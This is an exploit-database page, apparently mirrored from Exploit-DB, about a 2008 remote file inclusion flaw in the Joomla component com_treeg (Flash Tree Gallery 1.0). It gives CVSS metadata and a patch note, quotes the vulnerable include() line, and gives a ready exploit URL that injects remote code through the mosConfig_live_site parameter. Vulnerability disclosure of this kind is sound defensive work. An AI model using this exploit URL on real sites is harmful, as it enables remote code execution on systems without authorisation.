header-logo
Suggest Exploit
vendor:
com_treeg
by:
NoGe
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: com_treeg
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:justjoomla:com_treeg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'mosConfig_live_site' parameter of the vulnerable 'admin.treeg.php' script. This can allow the attacker to execute arbitrary remote code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

==================================================================================================================


  [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability

       Software : com_treeg version 1.0
       Vendor   : http://justjoomla.net/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


==================================================================================================================


  [o] Vulnerable file

       administrator/components/com_treeg/admin.treeg.php

        include( "$mosConfig_live_site/components/com_treeg/about.html" );



  [o] Exploit

       http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]


==================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
       VOP Crew [ Vrs-hCk OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
==================================================================================================================

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR